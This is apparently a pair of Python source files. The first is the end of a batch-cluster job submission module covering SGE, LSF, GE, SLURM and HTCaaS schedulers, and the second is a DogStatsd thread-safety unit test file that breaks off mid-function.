if not self.check_termination(line.split()[0].split('.')[0]):
idle += 1
else:
fail += 1
if status.returncode != 0 and status.returncode is not None:
raise ClusterManagmentError('server fails in someway (errorcode %s)' % status.returncode)
for id in list(self.submitted_ids):
if id not in ongoing:
status2 = self.check_termination(id)
if status2 == 'wait':
run += 1
elif status2 == 'resubmit':
idle += 1
return idle, run, self.submitted - (idle+run+fail), fail
@multiple_try()
def remove(self, *args, **opts):
"""Clean the jobs on the cluster"""
if not self.submitted_ids:
return
cmd = "qdel %s" % ' '.join(self.submitted_ids)
status = misc.Popen([cmd], shell=True, stdout=open(os.devnull,'w'))
self.submitted_ids = []
class SGECluster(Cluster):
"""Basic class for dealing with cluster submission"""
# Class written by Arian Abrahantes.
name = 'sge'
job_id = 'JOB_ID'
idle_tag = ['qw', 'hqw','hRqw','w']
running_tag = ['r','t','Rr','Rt']
identifier_length = 10
def def_get_path(self,location):
"""replace string for path issues"""
location = os.path.realpath(location)
homePath = os.getenv("HOME")
if homePath:
location = location.replace(homePath,'$HOME')
return location
@multiple_try()
def submit(self, prog, argument=[], cwd=None, stdout=None, stderr=None, log=None,
required_output=[], nb_submit=0):
"""Submit a job prog to an SGE cluster"""
me_dir = self.get_jobs_identifier(cwd, prog)
if cwd is None:
#cwd = os.getcwd()
cwd = self.def_get_path(os.getcwd())
cwd1 = self.def_get_path(cwd)
text = " cd %s;" % cwd1
if stdout is None:
stdout = '/dev/null'
else:
stdout = self.def_get_path(stdout)
if stderr is None:
stderr = '/dev/null'
elif stderr == -2: # -2 is subprocess.STDOUT
stderr = stdout
else:
stderr = self.def_get_path(stderr)
if log is None:
log = '/dev/null'
else:
log = self.def_get_path(log)
text += prog
if argument:
text += ' ' + ' '.join(argument)
#if anything slips through argument
#print "!=== inteded change ",text.replace('/srv/nfs','')
#text = text.replace('/srv/nfs','')
homePath = os.getenv("HOME")
if homePath:
text = text.replace(homePath,'$HOME')
logger.debug("!=== input %s" % text)
logger.debug("!=== output %s" % stdout)
logger.debug("!=== error %s" % stderr)
logger.debug("!=== logs %s" % log)
command = ['qsub','-o', stdout,
'-N', me_dir,
'-e', stderr,
'-V']
if self.cluster_queue and self.cluster_queue != 'None':
command.extend(['-q', self.cluster_queue])
a = misc.Popen(command, stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
stdin=subprocess.PIPE, cwd=cwd)
output = a.communicate(text.encode())[0].decode(errors='ignore')
id = output.split(' ')[2]
if not id.isdigit():
raise ClusterManagmentError('fail to submit to the cluster: \n%s' \
% output)
self.submitted += 1
self.submitted_ids.append(id)
logger.debug(output)
return id
@multiple_try()
def control_one_job(self, id):
""" control the status of a single job with it's cluster id """
#cmd = 'qstat '+str(id)
cmd = 'qstat '
status = misc.Popen([cmd], shell=True, stdout=subprocess.PIPE)
for line in status.stdout:
line = line.decode(errors='ignore')
#print "!==",line
#line = line.strip()
#if 'Unknown' in line:
# return 'F'
#elif line.startswith(str(id)):
# status = line.split()[4]
if str(id) in line:
status = line.split()[4]
#print "!=status", status
if status in self.idle_tag:
return 'I'
elif status in self.running_tag:
return 'R'
return 'F'
@multiple_try()
def control(self, me_dir):
""" control the status of a single job with it's cluster id """
cmd = "qstat "
status = misc.Popen([cmd], shell=True, stdout=subprocess.PIPE)
me_dir = self.get_jobs_identifier(me_dir)
finished = list(self.submitted_ids)
idle, run, fail = 0, 0, 0
for line in status.stdout:
line = line.decode(errors='ignore')
if me_dir in line:
id,_,_,_,status = line.split()[:5]
if status in self.idle_tag:
idle += 1
finished.remove(id)
elif status in self.running_tag:
run += 1
finished.remove(id)
else:
logger.debug(line)
fail += 1
finished.remove(id)
for id in finished:
self.check_termination(id)
return idle, run, self.submitted - (idle+run+fail), fail
@multiple_try()
def remove(self, *args, **opts):
"""Clean the jobs on the cluster"""
if not self.submitted_ids:
return
cmd = "qdel %s" % ' '.join(self.submitted_ids)
status = misc.Popen([cmd], shell=True, stdout=open(os.devnull,'w'))
self.submitted_ids = []
class LSFCluster(Cluster):
"""Basic class for dealing with cluster submission"""
name = 'lsf'
job_id = 'LSB_JOBID'
@multiple_try()
def submit(self, prog, argument=[], cwd=None, stdout=None, stderr=None, log=None,
required_output=[], nb_submit=0):
"""Submit the job prog to an LSF cluster"""
me_dir = self.get_jobs_identifier(cwd, prog)
text = ""
command = ['bsub', '-C0', '-J', me_dir]
if cwd is None:
cwd = os.getcwd()
else:
text = " cd %s;" % cwd
if stdout and isinstance(stdout, str):
command.extend(['-o', stdout])
if stderr and isinstance(stdout, str):
command.extend(['-e', stderr])
elif stderr == -2: # -2 is subprocess.STDOUT
pass
if log is None:
log = '/dev/null'
text += prog
if argument:
text += ' ' + ' '.join(argument)
if self.cluster_queue and self.cluster_queue != 'None':
command.extend(['-q', self.cluster_queue])
a = misc.Popen(command, stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
stdin=subprocess.PIPE, cwd=cwd)
output = a.communicate(text.encode())[0].decode(errors='ignore')
#Job <nnnn> is submitted to default queue <normal>.
try:
id = output.split('>',1)[0].split('<')[1]
except:
raise ClusterManagmentError('fail to submit to the cluster: \n%s' \
% output)
if not id.isdigit():
raise ClusterManagmentError('fail to submit to the cluster: \n%s' \
% output)
self.submitted += 1
self.submitted_ids.append(id)
return id
@multiple_try()
def control_one_job(self, id):
""" control the status of a single job with it's cluster id """
cmd = 'bjobs '+str(id)
status = misc.Popen([cmd], shell=True, stdout=subprocess.PIPE)
for line in status.stdout:
line = line.decode(errors='ignore').strip().upper()
if 'JOBID' in line:
continue
elif str(id) not in line:
continue
status = line.split()[2]
if status == 'RUN':
return 'R'
elif status == 'PEND':
return 'I'
elif status == 'DONE':
return 'F'
else:
return 'H'
return 'F'
@multiple_try()
def control(self, me_dir):
""" control the status of a single job with it's cluster id """
if not self.submitted_ids:
return 0, 0, 0, 0
cmd = "bjobs " + ' '.join(self.submitted_ids)
status = misc.Popen([cmd], shell=True, stdout=subprocess.PIPE)
jobstatus = {}
for line in status.stdout:
line = line.decode(errors='ignore').strip()
if 'JOBID' in line:
continue
splitline = line.split()
id = splitline[0]
if id not in self.submitted_ids:
continue
jobstatus[id] = splitline[2]
idle, run, fail = 0, 0, 0
for id in self.submitted_ids[:]:
if id in jobstatus:
status = jobstatus[id]
else:
status = 'MISSING'
if status == 'RUN':
run += 1
elif status == 'PEND':
idle += 1
else:
status = self.check_termination(id)
if status == 'wait':
run += 1
elif status == 'resubmit':
idle += 1
return idle, run, self.submitted - (idle+run+fail), fail
@multiple_try()
def remove(self, *args,**opts):
"""Clean the jobs on the cluster"""
if not self.submitted_ids:
return
cmd = "bkill %s" % ' '.join(self.submitted_ids)
status = misc.Popen([cmd], shell=True, stdout=open(os.devnull,'w'))
self.submitted_ids = []
class GECluster(Cluster):
"""Class for dealing with cluster submission on a GE cluster"""
name = 'ge'
job_id = 'JOB_ID'
idle_tag = ['qw']
running_tag = ['r']
@multiple_try()
def submit(self, prog, argument=[], cwd=None, stdout=None, stderr=None, log=None,
required_output=[], nb_submit=0):
"""Submit a job prog to a GE cluster"""
text = ""
if cwd is None:
cwd = os.getcwd()
else:
text = " cd %s; bash " % cwd
if stdout is None:
stdout = os.path.join(cwd, "log.%s" % prog.split('/')[-1])
if stderr is None:
stderr = os.path.join(cwd, "err.%s" % prog.split('/')[-1])
elif stderr == -2: # -2 is subprocess.STDOUT
stderr = stdout
if log is None:
log = '/dev/null'
text += prog
if argument:
text += ' ' + ' '.join(argument)
text += '\n'
tmp_submit = os.path.join(cwd, 'tmp_submit')
open(tmp_submit,'w').write(text)
a = misc.Popen(['qsub','-o', stdout,
'-e', stderr,
tmp_submit],
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
stdin=subprocess.PIPE, cwd=cwd)
output = a.communicate()[0].decode(errors='ignore')
#Your job 874511 ("test.sh") has been submitted
pat = re.compile("Your job (\d*) \(",re.MULTILINE)
try:
id = pat.search(output).groups()[0]
except:
raise ClusterManagmentError('fail to submit to the cluster: \n%s' \
% output)
self.submitted += 1
self.submitted_ids.append(id)
return id
@multiple_try()
def control_one_job(self, id):
""" control the status of a single job with it's cluster id """
cmd = 'qstat | grep '+str(id)
status = misc.Popen([cmd], shell=True, stdout=subprocess.PIPE)
if not status:
return 'F'
#874516 0.00000 test.sh alwall qw 03/04/2012 22:30:35 1
pat = re.compile("^(\d+)\s+[\d\.]+\s+[\w\d\.]+\s+[\w\d\.]+\s+(\w+)\s")
stat = ''
for line in status.stdout.read().decode(errors='ignore').split('\n'):
if not line:
continue
line = line.strip()
try:
groups = pat.search(line).groups()
except:
raise ClusterManagmentError('bad syntax for stat: \n\"%s\"' % line)
if groups[0] != id: continue
stat = groups[1]
if not stat:
return 'F'
if stat in self.idle_tag:
return 'I'
if stat in self.running_tag:
return 'R'
@multiple_try()
def control(self, me_dir=None):
"""Check the status of job associated to directory me_dir. return (idle, run, finish, fail)"""
if not self.submitted_ids:
return 0, 0, 0, 0
idle, run, fail = 0, 0, 0
ongoing = []
for statusflag in ['p', 'r', 'sh']:
cmd = 'qstat -s %s' % statusflag
status = misc.Popen([cmd], shell=True, stdout=subprocess.PIPE)
#874516 0.00000 test.sh alwall qw 03/04/2012 22:30:35 1
pat = re.compile("^(\d+)")
for line in status.stdout.read().decode(errors='ignore').split('\n'):
line = line.strip()
try:
id = pat.search(line).groups()[0]
except Exception:
pass
else:
if id not in self.submitted_ids:
continue
ongoing.append(id)
if statusflag == 'p':
idle += 1
if statusflag == 'r':
run += 1
if statusflag == 'sh':
fail += 1
for id in list(self.submitted_ids):
if id not in ongoing:
self.check_termination(id)
#self.submitted_ids = ongoing
return idle, run, self.submitted - idle - run - fail, fail
@multiple_try()
def remove(self, *args, **opts):
"""Clean the jobs on the cluster"""
if not self.submitted_ids:
return
cmd = "qdel %s" % ' '.join(self.submitted_ids)
status = misc.Popen([cmd], shell=True, stdout=open(os.devnull,'w'))
self.submitted_ids = []
def asyncrone_launch(exe, cwd=None, stdout=None, argument = [], **opt):
"""start a computation and not wait for it to finish.
this fonction returns a lock which is locked as long as the job is
running."""
mc = MultiCore(1)
mc.submit(exe, argument, cwd, stdout, **opt)
mc.need_waiting = True
return mc.lock
class SLURMCluster(Cluster):
"""Basic class for dealing with cluster submission"""
name = 'slurm'
job_id = 'SLURM_JOBID'
idle_tag = ['Q','PD','S','CF']
running_tag = ['R', 'CG']
complete_tag = ['C']
identifier_length = 8
@multiple_try()
def submit(self, prog, argument=[], cwd=None, stdout=None, stderr=None, log=None,
required_output=[], nb_submit=0):
"""Submit a job prog to a SLURM cluster"""
me_dir = self.get_jobs_identifier(cwd, prog)
if cwd is None:
cwd = os.getcwd()
if stdout is None:
stdout = '/dev/null'
if stderr is None:
stderr = '/dev/null'
elif stderr == -2: # -2 is subprocess.STDOUT
stderr = stdout
if log is None:
log = '/dev/null'
command = ['sbatch', '-o', stdout,
'-J', me_dir,
'-e', stderr, prog] + argument
if self.cluster_queue and self.cluster_queue != 'None':
command.insert(1, '-p')
command.insert(2, self.cluster_queue)
a = misc.Popen(command, stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
stdin=subprocess.PIPE, cwd=cwd)
output = a.communicate()
output_arr = output[0].decode(errors='ignore').split(' ')
id = output_arr[3].rstrip()
if not id.isdigit():
id = re.findall('Submitted batch job ([\d\.]+)', ' '.join(output_arr))
if not id or len(id)>1:
raise ClusterManagmentError( 'fail to submit to the cluster: \n%s' \
% ('stdout: %s\nstderr %s' %(output[0],output[1])))
id = id[0]
self.submitted += 1
self.submitted_ids.append(id)
return id
@multiple_try()
def control_one_job(self, id):
""" control the status of a single job with it's cluster id """
cmd = 'squeue j'+str(id)
status = misc.Popen([cmd], shell=True, stdout=subprocess.PIPE,
stderr=open(os.devnull,'w'))
for line in status.stdout:
line = line.decode(errors='ignore').strip()
if 'Invalid' in line:
return 'F'
elif line.startswith(str(id)):
status = line.split()[4]
if status in self.idle_tag:
return 'I'
elif status in self.running_tag:
return 'R'
return 'F'
@multiple_try()
def control(self, me_dir):
""" control the status of a single job with it's cluster id """
cmd = "squeue"
pstatus = misc.Popen([cmd], stdout=subprocess.PIPE)
me_dir = self.get_jobs_identifier(me_dir)
idle, run, fail = 0, 0, 0
ongoing=[]
for line in pstatus.stdout:
line = line.decode(errors='ignore')
if me_dir in line:
id, _, _,_ , status,_ = line.split(None,5)
ongoing.append(id)
if status in self.idle_tag:
idle += 1
elif status in self.running_tag:
run += 1
elif status in self.complete_tag:
status = self.check_termination(id)
if status == 'wait':
run += 1
elif status == 'resubmit':
idle += 1
else:
fail += 1
#control other finished job
for id in list(self.submitted_ids):
if id not in ongoing:
status = self.check_termination(id)
if status == 'wait':
run += 1
elif status == 'resubmit':
idle += 1
return idle, run, self.submitted - (idle+run+fail), fail
@multiple_try()
def remove(self, *args, **opts):
"""Clean the jobs on the cluster"""
if not self.submitted_ids:
return
cmd = "scancel %s" % ' '.join(self.submitted_ids)
status = misc.Popen([cmd], shell=True, stdout=open(os.devnull,'w'))
self.submitted_ids = []
class HTCaaSCluster(Cluster):
"""Class for dealing with cluster submission on a HTCaaS cluster using GPFS """
name= 'htcaas'
job_id = 'HTCAAS_JOBID'
idle_tag = ['waiting']
running_tag = ['preparing','running']
complete_tag = ['done']
@store_input()
@multiple_try()
def submit2(self, prog, argument=[], cwd=None, stdout=None, stderr=None,
log=None, input_files=[], output_files=[], required_output=[],
nb_submit=0):
"""Submit the HTCaaS job on the cluster with NO SHARE DISK
input/output file should be given as relative to CWd
"""
# To make workspace name(temp)
cur_usr = os.getenv('USER')
if cwd is None:
cwd = os.getcwd()
cwd_cp = cwd.rsplit("/",2)
if not stdout is None:
print("stdout: %s" % stdout)
if not os.path.exists(prog):
prog = os.path.join(cwd, prog)
if not required_output and output_files:
required_output = output_files
logger.debug(prog)
if 'combine' not in prog and 'pythia' not in prog and 'shower' not in prog :
cwd_arg = cwd+"/arguments"
temp = ' '.join([str(a) for a in argument])
arg_cmd="echo '"+temp+"' > " + cwd_arg
command = ['htcaas-mgjob-submit','-d',cwd,'-e',os.path.basename(prog)]
if argument :
command.extend(['-a ', '='.join([str(a) for a in argument])])
a = misc.Popen(command, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE, cwd=cwd)
id = a.stdout.read().strip()
else:
cwd_arg = cwd+"/arguments"
temp = ' '.join([str(a) for a in argument])
temp_file_name = "sub." + os.path.basename(prog)
text = """#!/bin/bash
MYPWD=%(cwd)s
cd $MYPWD
input_files=(%(input_files)s )
for i in ${input_files[@]}
do
chmod -f +x $i
done
/bin/bash %(prog)s %(arguments)s > %(stdout)s
"""
dico = {'cwd':cwd, 'input_files': ' '.join(input_files + [prog]), 'stdout': stdout, 'prog':prog,
'arguments': ' '.join([str(a) for a in argument]),
'program': ' ' if '.py' in prog else 'bash'}
# writing a new script for the submission
new_prog = pjoin(cwd, temp_file_name)
open(new_prog, 'w').write(text % dico)
misc.Popen(['chmod','+x',new_prog],cwd=cwd)
command = ['htcaas-mgjob-submit','-d',cwd,'-e',temp_file_name]
a = misc.Popen(command, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE, cwd=cwd)
id = a.stdout.read().strip()
logger.debug(id)
nb_try=0
nb_limit=5
if not id.isdigit() :
print("[ID is not digit]:" + id)
while not id.isdigit() :
nb_try+=1
print("[fail_retry]:"+ nb_try)
a=misc.Popen(command, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE, cwd=cwd)
id = a.stdout.read().strip()
if nb_try > nb_limit :
raise ClusterManagementError('fail to submit to the HTCaaS cluster: \n %s' % id)
break
self.submitted += 1
self.submitted_ids.append(id)
return id
@multiple_try(nb_try=10, sleep=5)
def control_one_job(self, id):
""" control the status of a single job with it's cluster id """
if id == 0 :
status_out ='C'
else :
cmd = 'htcaas-job-status -m '+str(id)+ " -s | grep Status "
status = misc.Popen([cmd], shell=True,stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
error = status.stderr.read().decode(errors='ignore')
if status.returncode or error:
raise ClusterManagmentError('htcaas-job-submit returns error: %s' % error)
status_out= status.stdout.read().decode(errors='ignore').strip()
status_out= status_out.split(":",1)[1]
if status_out == 'waiting':
status_out='I'
elif status_out == 'preparing' or status_out == 'running':
status_out = 'R'
elif status_out != 'done':
status_out = 'F'
elif status_out == 'done':
status_out = 'C'
return status_out
@multiple_try()
def control(self, me_dir):
""" control the status of a single job with it's cluster id """
if not self.submitted_ids:
logger.debug("self.submitted_ids not exists")
return 0, 0, 0, 0
ongoing = []
idle, run, fail = 0, 0, 0
start = self.submitted_ids[0]
end = self.submitted_ids[-1]
cmd = "htcaas-job-status -c "+str(start)+"-"+str(end)#+" -ac"
status = misc.Popen([cmd], shell=True, stdout=subprocess.PIPE)
for line in status.stdout:
#ongoing.append(line.split()[0].strip())
status2 = line.decode(errors='ignore').split()[-1]
if status2 != 'null' or line.split()[0].strip() != '0':
ongoing.append(line.split()[0].strip())
logger.debug("["+line.split()[0].strip()+"]"+status2)
if status2 != 'null' or line.split()[0].strip() != '0':
idle += 1
elif status2 in self.idle_tag:
idle += 1
elif status2 in self.running_tag:
run += 1
elif status2 in self.complete_tag:
if not self.check_termination(line.split()[0]):
idle +=1
else:
fail += 1
return idle, run, self.submitted - (idle+run+fail), fail
@multiple_try()
def remove(self, *args, **opts):
"""Clean the jobson the cluster"""
if not self.submitted_ids:
return
for i in range(len(self.submitted_ids)):
cmd = "htcaas-job-cancel -m %s" % self.submitted_ids[i]
status = misc.Popen([cmd], shell=True, stdout=open(os.devnull,'w'))
class HTCaaS2Cluster(Cluster):
"""Class for dealing with cluster submission on a HTCaaS cluster without GPFS """
name= 'htcaas2'
job_id = 'HTCAAS2_JOBID'
idle_tag = ['waiting']
running_tag = ['preparing','running']
complete_tag = ['done']
@store_input()
@multiple_try()
def submit2(self, prog, argument=[], cwd=None, stdout=None, stderr=None,
log=None, input_files=[], output_files=[], required_output=[],
nb_submit=0):
"""Submit the HTCaaS job on the cluster with NO SHARE DISK
input/output file should be given as relative to CWD
"""
if cwd is None:
cwd = os.getcwd()
if not os.path.exists(prog):
prog = os.path.join(cwd, prog)
if 'combine' not in prog and 'pythia' not in prog and 'shower' not in prog :
if cwd or prog :
self.submitted_dirs.append(cwd)
self.submitted_exes.append(prog)
else:
logger.debug("cwd and prog not exist->"+cwd+" / "+ os.path.basename(prog))
if argument :
self.submitted_args.append('='.join([str(a) for a in argument]))
if cwd or prog :
self.submitted += 1
id = self.submitted
self.submitted_ids.append(id)
else:
logger.debug("cwd and prog are not exist! ")
id = 0
else:
temp_file_name = "sub."+ os.path.basename(prog)
text = """#!/bin/bash
MYPWD=%(cwd)s
cd $MYPWD
input_files=(%(input_files)s )
for i in ${input_files[@]}
do
chmod -f +x $i
done
/bin/bash %(prog)s %(arguments)s > %(stdout)s
"""
dico = {'cwd':cwd, 'input_files': ' '.join(input_files + [prog]), 'stdout': stdout, 'prog':prog,
'arguments': ' '.join([str(a) for a in argument]),
'program': ' ' if '.py' in prog else 'bash'}
# writing a new script for the submission
new_prog = pjoin(cwd, temp_file_name)
open(new_prog, 'w').write(text % dico)
misc.Popen(['chmod','+x',new_prog],cwd=cwd)
command = ['htcaas-mgjob-submit','-d',cwd,'-e',new_prog]
a = misc.Popen(command, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE, cwd=cwd)
id = a.stdout.read().strip()
logger.debug("[mode2]-["+str(id)+"]")
if cwd and prog :
self.submitted += 1
self.submitted_ids.append(id)
else:
logger.debug("cwd and prog are not exist! ")
id = 0
return id
@multiple_try()
def metasubmit(self, me_dir=None):
if self.submitted > 1100 and self.submitted == len(self.submitted_ids):
tmp_leng= len(self.submitted_ids)/2
tmp_dirs1= self.submitted_dirs[0:tmp_leng]
tmp_dirs2= self.submitted_dirs[tmp_leng:]
tmp_exes1= self.submitted_exes[0:tmp_leng]
tmp_exes2= self.submitted_exes[tmp_leng:]
command1 = ['htcaas-mgjob-submit','-d',":".join([str(a) for a in tmp_dirs1 if a and a != ' ']),
'-e', ":".join([str(a) for a in tmp_exes1 if a and a != ' '])]
command2 = ['htcaas-mgjob-submit','-d',":".join([str(a) for a in tmp_dirs2 if a and a != ' ']),
'-e', ":".join([str(a) for a in tmp_exes2 if a and a != ' '])]
if len(self.submitted_args) > 0 :
tmp_args1= self.submitted_args[0:tmp_leng]
tmp_args2= self.submitted_args[tmp_leng:]
command1.extend(['-a', ':'.join([str(a) for a in tmp_args1])])
command2.extend(['-a', ':'.join([str(a) for a in tmp_args2])])
result1 = misc.Popen(command1, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
result2 = misc.Popen(command2, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
me_dir = str(result1.stdout.read().strip())+ "//" + str(result2.stdout.read().strip())
elif self.submitted > 0 and self.submitted == self.submitted_ids[-1]:
command = ['htcaas-mgjob-submit','-d',":".join([str(a) for a in self.submitted_dirs if a and a != ' ']),
'-e', ":".join([str(a) for a in self.submitted_exes if a and a != ' '])]
if len(self.submitted_args) > 0 :
command.extend(['-a', ':'.join([str(a) for a in self.submitted_args])])
if self.submitted_dirs[0] or self.submitted_exes[0] :
result = misc.Popen(command, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
me_dir = result.stdout.read().strip()
self.submitted_ids[0]=me_dir
else:
me_dir = self.submitted_ids[-1]
elif self.submitted > 0 and self.submitted != self.submitted_ids[-1]:
me_dir = self.submitted_ids[0]
else:
me_dir = -1
logger.debug("[" + str(me_dir) + "]")
self.submitted_dirs = []
self.submitted_exes = []
self.submitted_args = []
return me_dir
@multiple_try(nb_try=10, sleep=5)
def control_one_job(self, id):
""" control the status of a single job with it's cluster id """
#logger.debug("CONTROL ONE JOB MODE")
if self.submitted == self.submitted_ids[-1] :
id = self.metasubmit(self)
tempid = self.submitted_ids[-1]
self.submitted_ids.remove(self.submitted_ids[-1])
self.submitted_ids.append(id)
logger.debug(str(id)+" // "+str(self.submitted_ids[-1]))
if id == 0 :
status_out ='C'
else:
cmd = 'htcaas-job-status -m '+ str(id) + " -s | grep Status "
status = misc.Popen([cmd],shell=True,stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
error = status.stderr.read().decode(errors='ignore')
if status.returncode or error:
raise ClusterManagmentError('htcaas-job-status returns error: %s' % error)
status_out= status.stdout.read().decode(errors='ignore').strip()
status_out= status_out.split(":",1)[1]
logger.debug("[["+str(id)+"]]"+status_out)
if status_out == 'waiting':
status_out='I'
elif status_out == 'preparing' or status_out == 'running':
status_out = 'R'
elif status_out != 'done':
status_out = 'F'
elif status_out == 'done':
status_out = 'C'
self.submitted -= 1
return status_out
@multiple_try()
def control(self, me_dir):
""" control the status of a single job with it's cluster id """
if not self.submitted_ids:
logger.debug("self.submitted_ids not exists")
return 0, 0, 0, 0
if "//" in me_dir :
if int(me_dir.split("//")[0]) < int(me_dir.split("//")[1]) :
start = me_dir.split("//")[0]
end = me_dir.split("//")[1]
else :
start = me_dir.split("//")[1]
end = me_dir.split("//")[0]
elif "/" in me_dir : # update
start = 0
end = 0
elif me_dir.isdigit():
start = me_dir
end = me_dir
elif not me_dir.isdigit():
me_dir = self.submitted_ids[0]
logger.debug("Meta_ID is not digit(control), self.submitted_ids[0]: "+str(me_dir) )
ongoing = []
idle, run, fail, done = 0, 0, 0, 0
cmd = "htcaas-job-status -c "+str(start)+"-"+str(end) +" -ac"
status = misc.Popen([cmd], shell=True, stdout=subprocess.PIPE)
for line in status.stdout:
line = line.decode(errors='ignore')
status2 = line.split()[-1]
if status2 != 'null' or line.split()[0].strip() != '0':
ongoing.append(str(line.split()[0].strip())+"-"+str(line.split()[1].strip()))
logger.debug("["+line.split()[0].strip()+"-"+line.split()[1].strip()+"]"+status2)
if status2 == 'null' or line.split()[0].strip() == '0':
idle += 1
elif status2 in self.idle_tag:
idle += 1
elif status2 in self.running_tag:
run += 1
elif status2 in self.complete_tag:
done += 1
self.submitted -= 1
if not self.check_termination(line.split()[1]):
idle +=1
else:
fail += 1
return idle, run, self.submitted - (idle+run+fail), fail
@multiple_try()
def remove(self, *args, **opts):
"""Clean the jobson the cluster"""
if not self.submitted_ids:
return
id = self.submitted_ids[0]
if id:
cmd = "htcaas-job-cancel -m %s" % str(id)
status = misc.Popen([cmd], shell=True, stdout=open(os.devnull,'w'))
from_name = {'condor':CondorCluster, 'pbs': PBSCluster, 'sge': SGECluster,
'lsf': LSFCluster, 'ge':GECluster, 'slurm': SLURMCluster,
'htcaas':HTCaaSCluster, 'htcaas2':HTCaaS2Cluster}
onecore=MultiCore(1) # create a thread to run simple bash job without having to
#fork the main process
|
test_statsd_thread_safety.py
|
# stdlib
from collections import deque
from functools import reduce
import threading
import time
import unittest
# 3p
from mock import patch
# datadog
from datadog.dogstatsd.base import DogStatsd
from datadog.util.compat import is_p3k
class FakeSocket(object):
"""
Mocked socket for testing.
"""
def __init__(self):
self.payloads = deque()
def send(self, payload):
if is_p3k():
assert type(payload) == bytes
else:
assert type(payload) == str
self.payloads.append(payload)
def recv(self):
try:
return self.payloads
except IndexError:
return None
def __repr__(self):
return str(self.payloads)
class TestDogStatsdThreadSafety(unittest.TestCase):
"""
DogStatsd thread safety tests.
"""
def setUp(self):
"""
Mock a socket.
"""
self.socket = FakeSocket()
def assertMetrics(self, values):
"""
Helper, assertions on metrics.
"""
count = len(values)
# Split packet per metric (required when buffered) and discard empty packets
packets = map(lambda x: x.split(b"\n"), self.socket.recv())
packets = reduce(lambda prev, ele: prev + ele, packets, [])
packets = list(filter(lambda x: x, packets))
# Count
self.assertEquals(
len(packets), count,
u"Metric size assertion failed: expected={expected}, received={received}".format(
expected=count, received=len(packets)
)
)
# Values
for packet in packets:
metric_value = int(packet.split(b':', 1)[1].split(b'|', 1)[0])
self.assertIn(
metric_value, values,
u"Metric assertion failed: unexpected metric value {metric_value}".format(
metric_value=metric_value
)
)
values.remove(metric_value)
def test_socket_creation(self):
"""
Socket creation plays well with multiple threads.
"""
# Create a DogStatsd client but no socket
statsd = DogStatsd()
# Submit metrics from different threads to create a socket
threads = []
for value in range(10000):
t = threading.Thread(target=statsd.gauge, args=("foo", value))
threads.append(t)
t.start()
for t in threads:
t.join()
@staticmethod
def _submit_with_multiple_threads(statsd, submit_method, values):
"""
Helper, use the given statsd client and method to submit the values
within multiple threads.
"""
threads = []
for value in values:
t = threading.Thread(
target=getattr(statsd, submit_method),
args=("foo", value)
)
threads.append(t)
t.start()
for t in threads:
t.join()
def test_increment(self):
"""
Increments can be submitted from concurrent threads.
"""
# Create a DogStatsd client with a mocked socket
statsd = DogStatsd()
statsd.socket = self.socket
# Samples
values = set(range(10000))
# Submit metrics from different threads
self._submit_with_multiple_threads(statsd, "increment", values)
# All metrics were properly submitted
self.assertMetrics(values)
def test_decrement(self):
"""
Decrements can be submitted from concurrent threads.
"""
# Create a DogStatsd client with a mocked socket
statsd = DogStatsd()
statsd.socket = self.socket
# Samples
values = set(range(10000))
expected_value = set([-value for value in values])
# Submit metrics from different threads
self._submit_with_multiple_threads(statsd, "decrement", expected_value)
# All metrics were properly submitted
self.assertMetrics(values)
def test_gauge(self):
"""
Gauges can be submitted from concurrent threads.
"""
# Create a DogStatsd client with a mocked socket
statsd = DogStatsd()
statsd.socket = self.socket
# Samples
values = set(range(10000))
# Submit metrics from different threads
self._submit_with_multiple_threads(statsd, "gauge", values)
# All metrics were properly submitted
self.assertMetrics(values)
def test_histogram(self):
"""
Histograms can be submitted from concurrent threads.
"""
# Create a DogStatsd client with a mocked socket
statsd = DogStatsd()
statsd.socket = self.socket
# Samples
values = set(range(10000))
# Submit metrics from different threads
self._submit_with_multiple_threads(statsd, "histogram", values)
# All metrics were properly submitted
self.assertMetrics(values)
def test_timing(self):
"""
Timings can be submitted from concurrent threads.
"""
# Create a DogStatsd client with a mocked socket
statsd = DogStatsd()
statsd.socket = self.socket
# Samples
values = set(range(10000))
# Submit metrics from different threads
self._submit_with_multiple_threads(statsd, "timing", values)
# All metrics were properly submitted
self.assertMetrics(values)
def test_send_batch_metrics(self):
"""
Metrics can be buffered, submitted from concurrent threads.
"""
with DogStatsd() as batch_statsd:
# Create a DogStatsd buffer client with a mocked socket
batch_statsd.socket = self.socket
# Samples
values = set(range(10000))
# Submit metrics from different threads
self._submit_with_multiple_threads(batch_statsd, "gauge", values)
# All metrics were properly submitted
self.assertMetrics(values)
@patch('datadog.dogstatsd.context.time')
def test_timed_decorator_threaded(self, mock_time):
"""
`timed` decorator plays well with concurrent threads.
"""
# Create a DogStatsd client with a mocked socket
statsd = DogStatsd()
statsd.socket = self.socket
# Set up the mocked time
mock_time.return_value = 0
# Method to time
@statsd.timed("foo")
def bar():
"""
Wait 5 time units and return.
"""
initial_time = mock_time.return_value
while mock_time.return_value < initial_time + 2:
pass
# Run the method within multiple threads
threads = []
for value in range(10):
t = threading.Thread(target=bar)
threads.append(t)
# Bump time so that previous thread can complete
mock_time.return_value += 1
t.start()
# Sleep to let the threads start
time.sleep(0.1)
# Bump time so that all threads completes
time.sleep(0.1)
mock_time.return_value += 1
time.sleep(0.1)
mock_time.return_value += 1
for t in threads:
t.join()
# All metrics were properly submitted
expected_values = [2 for _ in range(0, 10)]
self.assertMetrics(expected_values)
@patch('datadog.dogstatsd.context.time')
def test_timed_context_manager_threaded(self, mock_time):
"""
`timed` context manager plays well with concurrent threads.
"""
# Create a DogStatsd client with a mocked socket
statsd = DogStatsd()
statsd.socket = self.socket
# Set up the mocked time
mock_time.return_value = 0
# Method to time
def bar():
"""
Wait 5 time units and return.
"""
initial_time = mock_time.return_value
